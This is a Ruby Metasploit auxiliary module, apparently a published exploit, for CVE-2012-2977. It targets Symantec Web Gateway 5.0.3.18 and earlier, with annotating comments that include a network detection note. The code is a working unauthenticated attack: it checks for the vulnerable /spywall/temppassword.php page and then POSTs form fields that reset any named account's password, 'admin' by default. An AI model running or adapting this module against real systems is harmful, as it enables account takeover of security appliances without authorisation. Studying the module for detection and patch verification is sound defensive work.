Symantec Web Gateway <= 5.0.3.18 - Arbitrary Password Change (Metasploit)



##

# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##

require 'msf/core'

# Metasploit auxiliary module for CVE-2012-2977 (BID 54430): on Symantec Web
# Gateway <= 5.0.3.18 the page /spywall/temppassword.php accepts a password
# change for an arbitrary account. The module sends no credentials of its own;
# it issues two POSTs to that URI - a bodiless probe, then the form submission.
#
# Detection note: the observable on the wire is an HTTP POST to
# /spywall/temppassword.php carrying USERNAME/password/password2/Save fields
# from a client that never completed a login.
class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::HttpClient

    # Registers module metadata and the user-settable options.
    #
    # @param info [Hash] framework-supplied module info merged via update_info
    def initialize(info={})
        super(update_info(info,
            'Name'           => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
            'Description'    => %q{
                    This module will change the password for the specified account on a Symantec Web Gatewaye server.
            },
            'License'        => MSF_LICENSE,
            # "$Revision: 0 $" is a placeholder SVN keyword, not a real revision.
            'Version'        => "$Revision: 0 $",
            'Author'         =>
                [
                    'Kc57',
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-2977' ],
                    # OSVDB id '0' is a placeholder; no OSVDB entry is recorded here.
                    [ 'OSVDB', '0' ],
                    [ 'BID', '54430' ],
                    [ 'URL', 'http://www.securityfocus.com/bid/54430' ],
                ],
            'DisclosureDate' => "Jul 23 2012" ))

            # USER is the account whose password is replaced (it is sent as the
            # USERNAME form field in run); its description string below still
            # reads "The password to reset to", which looks like a copy-paste slip.
            # PASSWORD is the new password, submitted twice (password/password2).
            register_options(
                [
                    Opt::RPORT(80),
                    OptString.new('USER', [ true, 'The password to reset to', 'admin']),
                    OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
                ], self.class)
    end

    # Probes the target for the vulnerable page, then submits the password change.
    #
    # Step 1: bodiless POST to /spywall/temppassword.php; a 200 whose body contains
    #         "Please Select a New Password" is treated as vulnerable, anything else
    #         (e.g. a redirect to the login page) aborts the run.
    # Step 2: POST the form fields target/USERNAME/password/password2/Save; a 200
    #         containing "Thank you" is reported as success.
    #
    # @return [void] results are reported via print_status / print_error only
    def run

        # The status line says https:// but the request goes to RPORT (default 80);
        # the scheme shown here is informational only.
        print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
        # 25-second response timeout for both requests.
        res = send_request_raw(
        {
            'method'  => 'POST',
            'uri'     => '/spywall/temppassword.php',
        }, 25)

        # Check to see if we get HTTP OK.
        # NOTE(review): if the connection fails the HttpClient mixin may return nil
        # here, in which case res.code would raise rather than print an error - confirm.
        if (res.code == 200)
            print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
        else
            print_error("Did not get HTTP 200, URL was not found. Exiting!")
            return
        end

        # Check whether the temppassword.php page itself loads or whether we were
        # redirected to the login page (the patched behaviour).
        if (res.body.match(/Please Select a New Password/i))
            print_status("Server is vulnerable!")
        else
            print_error("Target doesn't seem to be vulnerable!")
            return
        end

        print_status("Attempting to exploit password change vulnerability on #{rhost}")
        print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")

        # Form body is built by hand; USER and PASSWORD are inserted without
        # URL-encoding, so values containing '&' or '=' would alter the field layout.
        data  = 'target=executive_summary.php'
        data << '&USERNAME=' + datastore['USER']
        data << '&password=' + datastore['PASSWORD']
        data << '&password2=' + datastore['PASSWORD']
        data << '&Save=Save'

        res = send_request_cgi(
        {
            'method'  => 'POST',
            'uri'     => '/spywall/temppassword.php',
            'data'    => data,
        }, 25)

        # Success is inferred from the page text only; the module does not
        # verify the new credentials.
        if res.code == 200
            if (res.body.match(/Thank you/i))
                print_status("Password reset was successful!\n")
            else
                print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
            end
        else
            print_error("Password reset failed!")
        end
    end

end